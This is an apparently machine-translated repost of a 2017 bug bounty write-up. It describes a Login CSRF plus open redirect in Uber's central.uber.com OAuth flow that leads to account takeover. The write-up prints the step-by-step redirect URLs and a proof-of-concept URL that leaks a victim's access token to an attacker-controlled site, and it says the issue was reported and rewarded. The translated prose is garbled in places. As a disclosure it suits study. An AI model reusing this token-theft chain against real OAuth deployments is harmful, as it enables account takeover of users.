How Can I dig to a value of $ 8000 Uber vulnerability-vulnerability warning-the black bar safety net

2017-07-10T00:00:00
ID MYHACK58:62201787740
Type myhack58
Reporter 佚名
Modified 2017-07-10T00:00:00

Description

I study Uber vulnerability has been there for some time, and this is the first time I posted about the Uber vulnerability discovery report, I hope can give you some interesting burrowing ideas. In this article, I will share with you the one I'm in the Uber system in the discovery of interesting vulnerabilities Login CSRF + open redirection -> account to take over it. ! Long story short This vulnerability exists in Uber central. uber. com node, it uses the OAuth 2.0 Protocol as its login authorization mechanism, but the node did not correctly use the CSRF parameter, it will cause the attacker to be able to use this error use the state parameter to perform an open redirect and Login CSRF, and then in the realization of the redirect after stealing the URL hash of the access token. central. uber. com the login process First we have to understand the central. uber. com logon process before restoration, when the user clicks on the central. uber. com page in the Login button, the system operation mechanism and the jump is as follows: 1. https://central.uber.com/login?state=/somewhere 2. https://login.uber.com/oauth/authorize?response_type=code&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral. uber. com%2Foauth2-callback&state=%2Fsomewhere 3. https://central.uber.com/oauth2-callback?state=%2F&code=it53JtFe6BPGH1arCLxQ6InrT4MXdd 4. https://central.uber.com/somewhere Note:If you want to fully understand this vulnerability, you first have to clear the node using the user login process, so please spend some time to take a look at the above given jump link. When I see the whole login process, I think first method of attack is the state of the parameter/somewhere modified to//the google. com to achieve a possible open redirect. After modifying the login process is as follows: 1. https://central.uber.com/login?state=//google.com 2. https://login.uber.com/oauth/authorize?response_type=code&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral. uber. com%2Foauth2-callback&state=%2F%2fgoogle.com 3. https://central.uber.com/oauth2-callback?state=%2F%2fgoogle.com&code=it53JtFe6BPGH1arCLxQ6InrT4MXdd 4. //google.com Sure enough not what I expected, I succeeded in this login process into an open redirection vulnerability, but Uber is not accepted on open redirection vulnerability report, so I also need to find a way through this vulnerability found other more interesting vulnerabilities. But regardless, this is still a very good place to start. Since the Oauth request using code and not the token, so even if we found an open redirection vulnerability, and we still can't use it to steal any information. What if we will request the use of the code conversion for the token, then, what happens? 1. https://login.uber.com/oauth/authorize?response_type=token&scope=profile%20history&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral. uber. com%2Foauth2-callback&state=%2F%2fgoogle.com 2. https://central.uber.com/oauth2-callback?state=%2F%2fgoogle.com#access_token=xxxxx 3. Unable to achieve the redirect Since we are here not to https://central. uber. com/oauth2-callback to provide a valid code value, so in the above step 2 after it failed to achieve the redirection. If you are unable to achieve the redirection, then we can't steal the access token. So we have to think of a way to solve this problem, we need one for the oauth2-callback node a valid code value. Login CSRF In this case, the Login CSRF would come in handy. Due to this Uber node in the redirect when using CSRF state parameter, so we can directly to the attacker's valid OAuth code to add to the oauth2-callback node, which is then sent to the target user. When a user accesses this link after that it can be correctly redirected to the attacker the control of the page and leaked their access token. Limit Take advantage of this vulnerability when the only requirement is that the target user's browser has stored the login. uber. com authentication session information session one. Due to the central. uber. com is the Uber official OAuth client, so every Uber user default will accept central. uber. com request. Proof of concept PoC PoC https://login.uber.com/oauth/authorize?response_type=token&scope=profile%20history%20places%20ride_widgets%20request%20request_receipt%20all_trips&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral. uber. com%2Foauth2-callback%3fcode%3d attacker a valid OAuth code&state=%2F%2f attacker-controlled site PoC login process 1. https://login. uber. com/oauth/authorize? response_type=token&scope=profile%20history%20places%20ride_widgets%20request%20request_receipt%20all_trips&client_id=bOYt8vYWpnAacUZt9ng2LILDXnV-BAj4&redirect_uri=https%3A%2F%2Fcentral. uber. com%2Foauth2-callback%3fcode%3d{attacker a valid OAuth code}&state=%2F%2f attacker-controlled site 2. https://central. uber. com/oauth2-callback? state=%2F%2fhackerone. com&code={attacker a valid OAuth code}#access_token={target user's access token} 3.// hackerone. com#accesstoken={target user's access token} Summary Finally done! I have this vulnerability reported to the Uber's safety team, Uber also confirmed the vulnerability information after offering me 8,000 dollars for the vulnerability rewards. Thank you all for reading, if you have any other views or ideas please contact me! 281936@qq.com